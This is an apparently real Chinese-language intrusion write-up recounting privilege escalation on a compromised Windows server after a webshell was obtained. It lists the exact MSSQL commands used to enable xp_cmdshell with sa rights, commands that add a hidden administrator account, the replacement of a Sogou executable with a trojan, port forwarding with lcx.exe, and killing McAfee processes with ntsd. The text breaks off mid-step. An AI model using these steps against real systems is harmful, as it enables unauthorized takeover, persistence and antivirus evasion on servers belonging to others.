文章作者:udb311

前言：本文主要以SQL 2005提权为主，讲述过程种发现的一些问题和成功经验。至少拿到shell的过程不在细说。

前期

在拿到一个webshell 后对提权进行分析如下。

1、serv-u 6.4.0.
2、mssql sa密码权限
3、sogou拼音输入

观察完毕后发现这个服务器的安全性还真不是一般的差，serv-u 目录可写。sogu目录可写。MSSQL sa 权限无降权。

之一，先用马把sogou 目录下的pingup.exe替换了。准备等些时间再来上线呢，可是服务器安装了mcafee。过不了它。

第二，再探serv-u,使用大马自带的serv-u 提权程序先执行下。发现添加用户。。原因不明，可能是因为降权。。。

第三、开始入手MSSQL，sa权限很好办。先来开启xp_cmdshell，SQL2005默认禁用了xp_cmdshell。

1、使用shell下的SQL提权检测sql组件存在。如图

2、先使用xp_cmdshell，net user检测下可用否？执行net user，无果。

3、开启xp_cmdshell之前要先打开高级配置 

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;出现对象关闭时，不允许操作"。

4、开启xp_cmdshell 

EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 出现对象关闭时，不允许操作"。

t00ls大牛们说，是不是被降权了?

5、因为SQL不允许，接下来换aspxspy连接数据库。

再次执行 

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--     6、查看权限，成功返回system。如图

 

这才明白原来是aspspy功能方面的问题。细节绝对成败！

中期

7、添加用户
Exec master.dbo.xp_cmdshell 'net user admins udb311 /add'
如图

 

密码不满足策略要求，要复杂些的。
再来Exec master.dbo.xp_cmdshell 'net user admins udb311!@# /add'

 

7、添加到administratos组
Exec master.dbo.xp_cmdshell 'net localgroup administrators admins /add'

8、远程桌面服务打开着，ipconfig /all发现是内网，没有映射3389。

9、上传lcx.exe 转发之。发现执行后无反应。

10、换个远控木马执行。发现执行后也无反应。

11、tasklist /svc 查看服务。mcafee的进程ID分别是1760 1804 1876 3844 4824。

12、ntsd -c q -p 1760 先干掉一个，然后一个个全干了。

13、重新执行木马和lcx.exe 仍然无反应。

14、无耐之下，再看下进程tasklist /svc